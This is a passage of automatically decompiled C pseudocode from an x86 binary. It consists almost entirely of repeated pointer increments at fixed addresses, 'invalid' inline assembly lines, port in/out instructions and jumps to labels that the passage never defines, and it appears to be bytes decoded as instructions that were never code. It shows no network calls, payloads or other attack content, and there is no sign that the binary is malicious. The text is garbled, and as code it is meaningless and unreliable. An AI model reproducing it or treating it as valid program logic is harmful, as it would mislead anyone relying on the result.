				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *_t1221 =  *_t1221 + 2;
				 *_t1221 =  *_t1221 + _t1221;
				 *0x00000037 =  *((intOrPtr*)(0x37)) + 0x24;
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 3;
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 3;
				asm("adc al, [edx]");
				asm("invalid");
				asm("invalid");
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + 4;
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + 4;
				asm("aaa");
				 *0x00000047 =  *((intOrPtr*)(0x47)) + 2;
				 *0x00000005 =  *((intOrPtr*)(5)) + 5;
				asm("loopne 0xffffffcf");
				if ( *((intOrPtr*)(5)) < 0) goto L82;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				asm("lock and eax, 0x10040");
				 *((intOrPtr*)(5)) =  *((intOrPtr*)(5)) + 5;
				asm("aas");
				 *0x00000006 =  *((intOrPtr*)(6)) + 6;
				 *((intOrPtr*)(6)) =  *((intOrPtr*)(6)) + 6;
				_t1040 = 6 + _t1256 & 0x00010040;
				 *_t1040 =  *_t1040 + _t1040;
				asm("clc");
				_t1041 = _t1040 & 0x00000040;
				 *_t1041 =  *_t1041 + _t1041;
				asm("hlt");
				_t1042 = _t1041 & 0x00010040;
				 *_t1042 =  *_t1042 + _t1042;
				asm("clc");
				_t1044 = (_t1042 & 0x00000040) + 1;
				 *_t1256 =  *_t1256 + _t1256;
				_t1257 = _t1256 + 1;
				 *_t1044 =  *_t1044 + _t1044;
				 *_t1044 =  *_t1044 + _t1044;
				 *((intOrPtr*)(0x3c004024 + _t1221 + 0x76)) =  *((intOrPtr*)(0x3c004024 + _t1221 + 0x76)) + _t1257;
				 *((intOrPtr*)(0x12c)) =  *((intOrPtr*)(0x12c)) + 0x24;
				 *((intOrPtr*)(0x12c)) =  *((intOrPtr*)(0x12c)) + _t1257;
				 *_t1044 =  *_t1044 + _t1044;
				ds = 0x20006c00;
				 *((intOrPtr*)(_t1044 + _t1044)) =  *((intOrPtr*)(_t1044 + _t1044)) + _t1257;
				 *_t1044 =  *_t1044 + _t1044;
				_t1045 = _t1044 + 1;
				asm("invalid");
				 *_t1045 =  *_t1045 + 1;
				 *_t1045 =  *_t1045 + _t1045;
				 *_t1045 =  *_t1045 + _t1045;
				 *_t1045 =  *_t1045 + _t1045;
				 *_t1045 =  *_t1045 + 0x24;
				_t1046 = _t1045 + 1;
				 *_t1046 =  *_t1046 + _t1257;
				_t1258 = 0x3c004024;
				if ( *_t1046 >= 0) goto L83;
				_t1305 = _t1046;
				asm("invalid");
				asm("invalid");
				 *0x3c004024 =  *0x3c004024 + 0x3c004024;
				 *0x3c004024 =  *0x3c004024 + 0x3c004024;
				asm("clc");
				 *0x24000012 =  *((intOrPtr*)(0x24000012)) + _t1258;
				 *((intOrPtr*)(_t1277 + 0x11)) =  *((intOrPtr*)(_t1277 + 0x11)) + _t1258;
				 *((intOrPtr*)(_t1221 + _t1258 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1258 + 0x40)) + 1;
				 *0x24000003 =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
				 *_t1221 =  *_t1221 + 0x24000003;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t1221;
				 *0x24000038 =  *((intOrPtr*)(0x24000038)) + 0x24;
				 *0x24000004 =  *((intOrPtr*)(0x24000004)) + 0x24000004;
				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 0x24000004;
				 *0x23004218 =  *((intOrPtr*)(0x23004218)) + 1;
				asm("invalid");
				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 1;
				 *((intOrPtr*)(0x24000004)) =  *((intOrPtr*)(0x24000004)) + 0x24000004;
				asm("aaa");
				 *_t1258 =  *_t1258 & 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				asm("enter 0x76bf, 0x0");
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *((intOrPtr*)(0x90000012)) =  *((intOrPtr*)(0x90000012)) + 0x90000012;
				 *_t1221 =  *_t1221 + 0x8fffffec;
				 *((intOrPtr*)(0x8fffffec)) =  *((intOrPtr*)(0x8fffffec)) + 0x8fffffec;
				asm("aas");
				_t1059 = 0x8fffffec + _t1258 + 1;
				 *_t1059 =  *_t1059 + _t1059;
				 *_t1059 =  *_t1059 + _t1059;
				 *0x76 =  *0x76 + _t1221;
				_t1060 = _t1059 + 1;
				 *_t1221 =  *_t1221 + _t1060;
				 *_t1060 =  *_t1060 + _t1060;
				 *0x76 =  *0x76 + _t1258;
				_t1061 = _t1060 + 1;
				 *_t1061 =  *_t1061 + _t1061;
				 *_t1061 =  *_t1061 + _t1061;
				 *_t1061 =  *_t1061 + _t1258;
				asm("daa");
				_t1062 = _t1061 + 1;
				 *_t1221 =  *_t1221 + _t1062;
				 *_t1062 =  *_t1062 + _t1062;
				 *0x76 =  *0x76 + _t1258;
				_t1063 = _t1062 + 1;
				 *_t1063 =  *_t1063 + _t1063;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1258;
				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 2;
				 *((intOrPtr*)(_t1305 + _t1258 * 2)) =  *((intOrPtr*)(_t1305 + _t1258 * 2)) + _t1221;
				_t1259 = _t1258 + 1;
				 *_t1063 =  *_t1063 + _t1063;
				 *_t1063 =  *_t1063 + _t1063;
				_t1278 =  *_t1277;
				asm("in al, 0x3f");
				asm("aas");
				_t1067 = _t1063 + 2 + _t1259 + 1;
				 *_t1067 =  *_t1067 + _t1067;
				_pop(ds);
				 *((intOrPtr*)(_t1067 + _t1067)) =  *((intOrPtr*)(_t1067 + _t1067)) + _t1259;
				 *_t1067 =  *_t1067 + _t1067;
				_t1068 = _t1067 + 1;
				asm("invalid");
				 *_t1068 =  *_t1068 + 1;
				 *_t1068 =  *_t1068 + _t1068;
				 *_t1068 =  *_t1068 + _t1068;
				 *_t1068 =  *_t1068 + _t1068;
				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 4;
				 *_t1068 =  *_t1068 + _t1259;
				_pop(_t1260);
				if ( *_t1068 >= 0) goto L84;
				_t1069 = _t1305;
				_t1306 = _t1068;
				asm("invalid");
				asm("invalid");
				 *_t1069 =  *_t1069 + _t1069;
				 *_t1069 =  *_t1069 + _t1069;
				 *((intOrPtr*)(_t1278 + 0x11700040)) =  *((intOrPtr*)(_t1278 + 0x11700040)) + _t1260;
				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1260;
				_t1073 = (_t1069 ^ 0x00000027) + 3;
				 *((intOrPtr*)(_t1221 + _t1260 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1260 + 0x40)) + 1;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1073 =  *_t1073 + _t1073;
				 *_t1221 =  *_t1221 + _t1073;
				 *_t1221 =  *_t1221 + _t1073;
				 *((intOrPtr*)(_t1073 + 0x35)) =  *((intOrPtr*)(_t1073 + 0x35)) + 0x24;
				_t1074 = _t1073 + 1;
				 *_t1074 =  *_t1074 + _t1074;
				 *_t1074 =  *_t1074 + _t1074;
				_t1075 = _t1074 + 1;
				_push(ss);
				_t1213 = 8;
				asm("invalid");
				 *_t1075 =  *_t1075 + 1;
				 *_t1075 =  *_t1075 + _t1075;
				_t1077 = _t1075 + _t1075 ^ 0x201c0040;
				_t1262 = _t1260 + 2;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				_t651 = _t1077 + 0x49;
				 *_t651 =  *((intOrPtr*)(_t1077 + 0x49)) + _t1221;
				if ( *_t651 >= 0) goto L85;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				 *_t1077 =  *_t1077 + _t1077;
				_push(0x1004028);
				 *_t1077 =  *_t1077 + _t1077;
				 *((intOrPtr*)(0xb6)) =  *((intOrPtr*)(0xb6)) + 0x24;
				 *_t1077 =  *_t1077 + _t1077;
				_push(0x1004028);
				 *_t1077 =  *_t1077 + _t1077;
				 *((intOrPtr*)(_t1077 + 0x28)) =  *((intOrPtr*)(_t1077 + 0x28)) + _t1262;
				_t1078 = _t1077 + 1;
				 *_t1078 =  *_t1078 + _t1078;
				 *_t1078 =  *_t1078 + _t1078;
				 *((intOrPtr*)(_t1078 +  &_a64)) =  *((intOrPtr*)(_t1078 +  &_a64)) + _t1221;
				 *_t1262 =  *_t1262 + _t1078;
				 *_t1078 =  *_t1078 + _t1078;
				 *((intOrPtr*)(_t1078 + 0x28)) =  *((intOrPtr*)(_t1078 + 0x28)) + _t1262;
				_t1079 = _t1078 + 1;
				 *_t1079 =  *_t1079 + _t1079;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1262;
				_t1080 = _t1079 + _t1079;
				 *_t1080 =  *_t1080 - _t1080;
				_t1081 = _t1080 ^ 0x0000009a;
				_t1263 = _t1262 + 1;
				 *_t1081 =  *_t1081 + _t1081;
				 *_t1081 =  *_t1081 + _t1081;
				asm("out 0x75, al");
				 *0x3D4400B6 =  *((intOrPtr*)(0x3d4400b6)) + _t1263;
				_t1083 = _t1081 + _t1221 + 1;
				 *_t1083 =  *_t1083 + _t1083;
				_t1084 = _t1083 | 0x00003400;
				 *((intOrPtr*)(_t1281 + 0xb6)) =  *((intOrPtr*)(_t1281 + 0xb6)) + _t1263;
				 *_t1221 =  *_t1221 + _t1084;
				 *((intOrPtr*)(8)) =  *((intOrPtr*)(8)) + _t1084;
				 *_t1084 =  *_t1084 + _t1084;
				 *_t1084 =  *_t1084 + _t1084;
				 *_t1084 =  *_t1084 + _t1084;
				 *_t1084 =  *_t1084 + _t1084;
				_t1085 = _t1084 + _t1084;
				 *_t1085 =  *_t1085 - _t1085;
				_t1429 =  *_t1085;
				if(_t1429 < 0) {
					L90:
					 *_t1085 =  *_t1085 + _t1085;
					 *_t1085 =  *_t1085 + _t1085;
					 *_t1085 =  *_t1085 + _t1085;
				} else {
					if (_t1429 >= 0) goto L87;
					_t1155 = _t1085 +  *_t1085 + 1;
					 *0x76 =  *0x76 + 8;
					 *_t1155 =  *_t1155 + 1;
					 *_t1155 =  *_t1155 + _t1155;
					 *((intOrPtr*)(_t1263 + 0xffffffffffff00b6)) =  *((intOrPtr*)(_t1263 + 0xffffffffffff00b6)) + _t1155;
					asm("invalid");
					 *_t1155 =  *_t1155 + _t1155;
					 *_t1155 =  *_t1155 + _t1155;
					 *_t1155 =  *_t1155 + _t1155;
					 *_t1155 =  *_t1155 + _t1155;
					_t1157 = (_t1155 | 0x00000029) + 1;
					 *_t1157 =  *_t1157 + _t1263;
					_pop(_t1263);
					if ( *_t1157 >= 0) goto L88;
					_t1085 = _t1306;
					_t1306 = _t1157;
					asm("invalid");
					asm("invalid");
					 *_t1085 =  *_t1085 + _t1085;
					 *_t1085 =  *_t1085 + _t1085;
					if( *_t1085 >= 0) {
						asm("daa");
						_t1160 = _t1085 + 1 + _t1263 + 1;
						 *((intOrPtr*)(_t1160 + 0x11)) =  *((intOrPtr*)(_t1160 + 0x11)) + _t1263;
						 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1263;
						_t1085 = _t1160 + 2;
						 *((intOrPtr*)(_t1221 + _t1263 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1263 + 0x40)) + 1;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						 *_t1085 =  *_t1085 + _t1085;
						goto L90;
					}
				}
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				 *_t1085 =  *_t1085 + _t1085;
				_t1086 = _t1085;
				 *_t1086 =  *_t1086 - _t1086;
				asm("lock daa");
				_t1087 = _t1086 + 1;
				 *((intOrPtr*)(_t1087 + 0x11)) =  *((intOrPtr*)(_t1087 + 0x11)) + _t1263;
				 *((intOrPtr*)(_t1278 + 0x11)) =  *((intOrPtr*)(_t1278 + 0x11)) + _t1263;
				_t1089 = _t1087 + 2;
				 *((intOrPtr*)(_t1221 + _t1263 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1263 + 0x40)) + _t1213;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
				 *_t1089 =  *_t1089 + _t1089;
